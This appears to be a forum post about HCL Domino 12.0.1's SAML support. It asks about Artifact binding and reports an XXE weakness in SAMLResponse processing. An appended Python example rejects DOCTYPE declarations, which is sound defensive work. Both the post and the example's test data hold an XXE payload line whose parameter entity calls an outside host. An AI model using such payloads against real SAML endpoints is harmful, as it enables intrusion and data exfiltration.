1.) HCL Domino server 12.0.1 (and older) is missing the SAML Artifact binding implementation/settings. It has only the SAML POST binding :-( Hmm, it also works with SOAP and inside the SAML POST binding, but the SAML Artifact binding didn't work for me at all. Is SAML Artifact binding supported, or do I just not know how to set it up?
I think the SAML Artifact binding increases security. Why? Right now all traffic goes via the browser, and Domino has a greater possible attack vector. Good thing: I have tried different XML signature wrapping attacks and Domino was not vulnerable :-)
2.) The Domino server, when doing SAML, is vulnerable to an XXE attack via a modified "SAMLResponse=" response. The "DOCTYPE" in the XML is processed by the Domino server (<!ENTITY % ext SYSTEM "http://anyserver/dtd.txt">).
Is it possible to disable DOCTYPE processing (DTD) inside Domino's XML processing?
A few links:
SAML 2.0 Artifact Binding: https://everything1know.wordpress.com/2019/02/19/saml-2-0-artifact-binding/
Improving SAML SSO Security Using HTTP Artifact Binding: https://www.identityserver.com/articles/improving-saml-sso-security-using-http-artifact-binding
Fun with SAML SSO Vulnerabilities and Footguns: https://workos.com/blog/fun-with-saml-sso-vulnerabilities-and-footguns
What is the purpose of a SAML Artifact?: https://stackoverflow.com/questions/13616169/what-is-the-purpose-of-a-saml-artifact/17451894#17451894
SAML2 Artifact Binding with signature validation in artifact resolve request: https://is.docs.wso2.com/en/latest/learn/configuring-saml-2.0-artifact-binding/
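Regarding item 2 above: the following is an added Python example, not Domino code and not from HCL, showing the gatekeeper check a SAML service provider would run before a SAMLResponse ever reaches its XML parser. Any DOCTYPE declaration is refused outright and parameter entities are never expanded, so a payload shaped like the `<!ENTITY % ext SYSTEM ...>` probe in the post is rejected before any URL could be fetched. The SAMLResponse contents, the host name anyserver.example and the function names are constructed for the example.

```python
"""
Added example (not Domino code): refuse any DOCTYPE/DTD in an incoming
SAMLResponse before the document is parsed, so external entity declarations
such as <!ENTITY % ext SYSTEM "..."> are never processed or resolved.
"""
import base64
import xml.parsers.expat as expat


class DoctypeNotAllowed(ValueError):
    """Raised when the XML carries a DOCTYPE/DTD; a SAML message never needs one."""


def parse_saml_response(saml_response_b64: str) -> list:
    """Decode the base64 SAMLResponse form field and parse it with DTDs refused.

    Returns the element names seen, in document order. A DOCTYPE anywhere in
    the document aborts parsing with DoctypeNotAllowed.
    """
    xml_bytes = base64.b64decode(saml_response_b64)
    parser = expat.ParserCreate()
    # Never expand parameter entities (the "% ext" style used in the XXE probe).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires as soon as "<!DOCTYPE" is seen, before any entity is declared.
        raise DoctypeNotAllowed(
            f"DOCTYPE {name!r} with SYSTEM id {sysid!r} rejected in SAMLResponse")

    def on_external_entity(context, base, sysid, pubid):
        # Belt and braces: returning 0 makes expat fail the parse instead of
        # resolving an external general entity reference.
        return 0

    elements = []
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(xml_bytes, True)
    return elements


def check_saml_response(saml_response_b64: str) -> dict:
    """Gate a SAML SP would apply before signature validation and assertion processing."""
    try:
        elements = parse_saml_response(saml_response_b64)
    except DoctypeNotAllowed as exc:
        return {"accepted": False, "reason": str(exc), "elements": []}
    except expat.ExpatError as exc:
        return {"accepted": False, "reason": f"malformed XML: {exc}", "elements": []}
    if not elements or elements[0] != "samlp:Response":
        return {"accepted": False, "reason": "root element is not samlp:Response",
                "elements": elements}
    return {"accepted": True, "reason": "ok", "elements": elements}


# Constructed, minimal (unsigned) SAMLResponse used only to exercise the check.
BENIGN_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                ID="_constructed-1" Version="2.0" IssueInstant="2022-01-01T00:00:00Z">
  <saml:Issuer>https://idp.example/metadata</saml:Issuer>
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
</samlp:Response>"""

# The same message with a DOCTYPE/parameter-entity probe prepended (constructed;
# the host name is a placeholder and is never contacted because parsing stops first).
XXE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE samlp:Response [
  <!ENTITY % ext SYSTEM "http://anyserver.example/dtd.txt">
  %ext;
]>""" + BENIGN_XML.split(b"?>", 1)[1]

BENIGN_SAML_RESPONSE_B64 = base64.b64encode(BENIGN_XML).decode()
XXE_SAML_RESPONSE_B64 = base64.b64encode(XXE_XML).decode()

if __name__ == "__main__":
    for label, b64 in (("benign", BENIGN_SAML_RESPONSE_B64), ("doctype", XXE_SAML_RESPONSE_B64)):
        print(label, check_saml_response(b64))
```

The design choice is to reject rather than sanitise: SAML responses are signed XML, so stripping a DOCTYPE would only produce a message that fails signature validation anyway, and refusing at the first `<!DOCTYPE` token means no entity is ever declared, let alone resolved. In Java's JAXP parsers the equivalent is setting the `http://apache.org/xml/features/disallow-doctype-decl` feature to true; whether Domino exposes such a setting is exactly the open question in the post.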